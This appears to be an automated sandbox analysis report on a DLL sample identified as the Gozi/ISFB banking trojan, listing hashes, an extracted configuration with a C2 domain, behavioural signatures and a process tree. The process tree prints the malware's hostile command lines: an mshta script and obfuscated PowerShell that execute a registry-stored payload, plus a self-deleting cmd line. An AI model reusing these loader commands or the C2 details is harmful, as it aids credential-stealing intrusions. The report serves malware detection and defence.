Overview

overview

10

Static

static

3

modulo.dll

windows7-x64

10

modulo.dll

windows10-2004-x64

10

Analysis

  • max time kernel
    151s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-10-2023 14:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    modulo.dll

  • Size

    206KB

  • MD5

    72e2a5c797954e895a41be5b20f867b2

  • SHA1

    419aacfb3ccea9b08277bcc9405054fa4238a597

  • SHA256

    858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0

  • SHA512

    77be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3

  • SSDEEP

    6144:sMmIE7vr+qWNGzfXDanCU60rPP+vJsWKq12Jy:o/7DrQGzfXDeCU6cevKWXwy

Score
10/10
gozi5050bankerisfbtrojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /jerry/

  • build

    250260

  • exe_type

    loader

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Extracted

Family

gozi

Botnet

5050

C2

fotexion.com

Attributes
  • base_path

    /pictures/

  • build

    250260

  • exe_type

    worker

  • extension

    .bob

  • server_id

    50

rsa_pubkey.plain
aes.plain

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

    bankertrojangozi
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
    1⤵
      PID:4832
    • C:\Windows\System32\RuntimeBroker.exe
      C:\Windows\System32\RuntimeBroker.exe -Embedding
      1⤵
        PID:3968
      • C:\Windows\System32\RuntimeBroker.exe
        C:\Windows\System32\RuntimeBroker.exe -Embedding
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3676
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of UnmapMainImage
        • Suspicious use of WriteProcessMemory
        PID:3096
        • C:\Windows\system32\rundll32.exe
          rundll32.exe C:\Users\Admin\AppData\Local\Temp\modulo.dll,#1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3352
          • C:\Windows\SysWOW64\rundll32.exe
            rundll32.exe C:\Users\Admin\AppData\Local\Temp\modulo.dll,#1
            3⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            PID:2964
        • C:\Windows\System32\mshta.exe
          "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ls41='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ls41).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\DD164BDA-982A-17AD-8A61-4C3B5E25409F\\\FolderOptions'));if(!window.flag)close()</script>"
          2⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4956
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name mvqhkawt -value gp; new-alias -name xebonw -value iex; xebonw ([System.Text.Encoding]::ASCII.GetString((mvqhkawt "HKCU:Software\AppDataLow\Software\Microsoft\DD164BDA-982A-17AD-8A61-4C3B5E25409F").MelodyTool))
            3⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1660
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhs5qwht\mhs5qwht.cmdline"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1172
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2E4E.tmp" "c:\Users\Admin\AppData\Local\Temp\mhs5qwht\CSCD17CF95F9F204EEB89CFE7A41FA8FAF.TMP"
                5⤵
                  PID:4068
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jwy4ceb5\jwy4ceb5.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3880
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3052.tmp" "c:\Users\Admin\AppData\Local\Temp\jwy4ceb5\CSC5A94C50A2864A919C9991CBA77C40A1.TMP"
                  5⤵
                    PID:4572
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\modulo.dll"
              2⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:4676
              • C:\Windows\system32\PING.EXE
                ping localhost -n 5
                3⤵
                • Runs ping.exe
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:4852
            • C:\Windows\syswow64\cmd.exe
              "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
              2⤵
                PID:3652
            • C:\Windows\System32\RuntimeBroker.exe
              C:\Windows\System32\RuntimeBroker.exe -Embedding
              1⤵
              • Modifies registry class
              PID:4756

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\RES2E4E.tmp
              Filesize

              1KB

              MD5

              2646c5b1953ee2e4f43efd110d21ec26

              SHA1

              dd3550f3b7654c3539ab0a497b674694f033e364

              SHA256

              367509f8895c836367146a67e7bb60a5700b74a1e7d2524d87757404591451d7

              SHA512

              6bd9a7229b69d9516ee5da9ce9c54ca034449f2a604cbafa54f484a7c092185ae2139bc01005a5253592c82dbdc4a0a2cba4adeee06eddd4b2f3184ba3a9304b

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES3052.tmp
              Filesize

              1KB

              MD5

              1b41cad9db315775a28c1ad9f6f9e8ea

              SHA1

              41af3a630e412cddaadc38aefa7a89792181efe7

              SHA256

              840997cc3771a35087eb09ac0fb48f5933f7d4120fa1a718369b41ab780eca28

              SHA512

              a0c956f2a4438adc0dd8fe263976d190971488087345c71838ca90a202a21b50daa6f1c9615d8197d2665157143bd70fb3c39d1ed1f55f712b9d572e39078fee

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv25vprq.k1d.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\jwy4ceb5\jwy4ceb5.dll
              Filesize

              3KB

              MD5

              affe482f6e6de5c8bd37ee949a3d4544

              SHA1

              2937f2f4f2e7094c5ecc51e56a3bc96ab177ab5d

              SHA256

              35e4c695ac1705815e3b5325b3ae5eeba1a97143b878c3a7875e88695cfe0ea4

              SHA512

              18ae50673b84b2b73b5883cccc784ac96688db17285a591422b9f4bcd8f4dcd0e683ea156dd4df6671668c07eb9016dbf62bc4df75af65d5b92406b9c07a93b4

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\mhs5qwht\mhs5qwht.dll
              Filesize

              3KB

              MD5

              7f38f8e3661aed02fa5402e8c5e341c3

              SHA1

              2fd5369a9fe4e3f6b03311a868a748d204481dbb

              SHA256

              4b228157cab3dcc3cf4154b8769ceff4fe0a32a9f5192aada48bb64aec68e9c1

              SHA512

              f5312135f980c5a5c3f0a638828b0945e0b7b31a53025e2262465eea9839da60f51e82e5adf7c1c45593d6b44ddeedb569ed8c06bb7bdc8a4afc1b44d779821e

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\jwy4ceb5\CSC5A94C50A2864A919C9991CBA77C40A1.TMP
              Filesize

              652B

              MD5

              374a69d4022df40ec664e7e7c23cf137

              SHA1

              557cb674d73c8943a40ee8957c81a4f65b978322

              SHA256

              72cd3214da197283e9deb413d1c0a301b37376f542824bfa50aa46d464d7f342

              SHA512

              aec4b10e3f0426145e79783831177a3a428b3b8c7dfc1d3e0a82fe71b0416fec23e4b6e6599b8c89014edc6779036dbdd3be2b2b3c045eff738d73ead8b500ea

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\jwy4ceb5\jwy4ceb5.0.cs
              Filesize

              406B

              MD5

              ca8887eacd573690830f71efaf282712

              SHA1

              0acd4f49fc8cf6372950792402ec3aeb68569ef8

              SHA256

              568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

              SHA512

              2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\jwy4ceb5\jwy4ceb5.cmdline
              Filesize

              369B

              MD5

              48f31da819404dd89db333a1061b1220

              SHA1

              f1f6412f40b889915ff6a99bcff96bccd878fcb9

              SHA256

              d045fc790e0671935512b61f3db0f02e684b38f95cd71a8bf2de272b3b8fbe06

              SHA512

              0a0817b097245b57d401d39df735e1d5757ac0d99880ba4f5efbd4091a8f84fc8e894e2ed322ca3e1657f5a668db27abf7a7d6cb80548caa2de63a964f9fd57c

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\mhs5qwht\CSCD17CF95F9F204EEB89CFE7A41FA8FAF.TMP
              Filesize

              652B

              MD5

              60471d9929601ff1885f30a57e8e0a47

              SHA1

              ce5af97f27507f2ff104eb39085e6c9fcdae8a07

              SHA256

              46230e3a766c5807ada6841058bd88f280a15f7c50974811e4d69c9f131909ee

              SHA512

              fd619dbc36db2175c4a59848221b524cfc48cddae09450b236ffd4a4827934d2e7565a3aca95ac33122475f5f46282dad70a5f8544b070fcabf925d879ac03ac

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\mhs5qwht\mhs5qwht.0.cs
              Filesize

              405B

              MD5

              caed0b2e2cebaecd1db50994e0c15272

              SHA1

              5dfac9382598e0ad2e700de4f833de155c9c65fa

              SHA256

              21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

              SHA512

              86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\mhs5qwht\mhs5qwht.cmdline
              Filesize

              369B

              MD5

              6cbd74149c93b5e693b0107dae21e968

              SHA1

              da37a4f60afc989716cfd31a79d042224d9647e4

              SHA256

              d8c3696ad403c55ad6b1141011214f43d21c8b06f63bf55af5ddd0a2066a69fe

              SHA512

              c05fb865ebb823eb5c4d3cb5f0b2d151edb0f553acf556938e030183a4927df5fcafb31da49ca0191ffc144a1bcea31cddee8fe26fe16eb5b764f7f6e0ebc1d1

              Download Submit

            • memory/1660-48-0x00000238E53A0000-0x00000238E53A8000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1660-64-0x00000238E53B0000-0x00000238E53ED000-memory.dmp

              Filesize

              244KB

              Download

            • memory/1660-20-0x00000238E5280000-0x00000238E5290000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1660-19-0x00000238E5280000-0x00000238E5290000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1660-34-0x00000238E5270000-0x00000238E5278000-memory.dmp

              Filesize

              32KB

              Download

            • memory/1660-18-0x00007FF91F370000-0x00007FF91FE31000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/1660-13-0x00000238E51E0000-0x00000238E5202000-memory.dmp

              Filesize

              136KB

              Download

            • memory/1660-21-0x00000238E5280000-0x00000238E5290000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1660-63-0x00007FF91F370000-0x00007FF91FE31000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/1660-50-0x00000238E53B0000-0x00000238E53ED000-memory.dmp

              Filesize

              244KB

              Download

            • memory/2964-6-0x0000000000680000-0x000000000068E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2964-1-0x0000000000680000-0x000000000068E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2964-2-0x0000000002170000-0x000000000217D000-memory.dmp

              Filesize

              52KB

              Download

            • memory/2964-0-0x0000000002030000-0x0000000002059000-memory.dmp

              Filesize

              164KB

              Download

            • memory/2964-110-0x0000000000680000-0x000000000068E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/2964-5-0x0000000002030000-0x0000000002059000-memory.dmp

              Filesize

              164KB

              Download

            • memory/3096-52-0x0000000008A50000-0x0000000008AF4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3096-53-0x0000000000960000-0x0000000000961000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3096-92-0x0000000008A50000-0x0000000008AF4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3652-109-0x0000000000F70000-0x0000000001008000-memory.dmp

              Filesize

              608KB

              Download

            • memory/3652-107-0x00000000007E0000-0x00000000007E1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3652-104-0x0000000000F70000-0x0000000001008000-memory.dmp

              Filesize

              608KB

              Download

            • memory/3676-99-0x0000027EF9D90000-0x0000027EF9E34000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3676-66-0x0000027EF9D90000-0x0000027EF9E34000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3676-67-0x0000027EF9C40000-0x0000027EF9C41000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3968-72-0x000002A433E00000-0x000002A433EA4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/3968-73-0x000002A433DC0000-0x000002A433DC1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/3968-105-0x000002A433E00000-0x000002A433EA4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4676-91-0x000001C747D00000-0x000001C747DA4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4676-93-0x000001C747CB0000-0x000001C747CB1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4676-114-0x000001C747D00000-0x000001C747DA4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4756-84-0x000001B268730000-0x000001B2687D4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4756-85-0x000001B268510000-0x000001B268511000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4756-112-0x000001B268730000-0x000001B2687D4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4832-79-0x0000023607FE0000-0x0000023607FE1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4832-78-0x0000023608840000-0x00000236088E4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4832-111-0x0000023608840000-0x00000236088E4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4852-98-0x00000195ABC20000-0x00000195ABCC4000-memory.dmp

              Filesize

              656KB

              Download

            • memory/4852-101-0x00000195ABA80000-0x00000195ABA81000-memory.dmp

              Filesize

              4KB

              Download

            • memory/4852-113-0x00000195ABC20000-0x00000195ABCC4000-memory.dmp

              Filesize

              656KB

              Download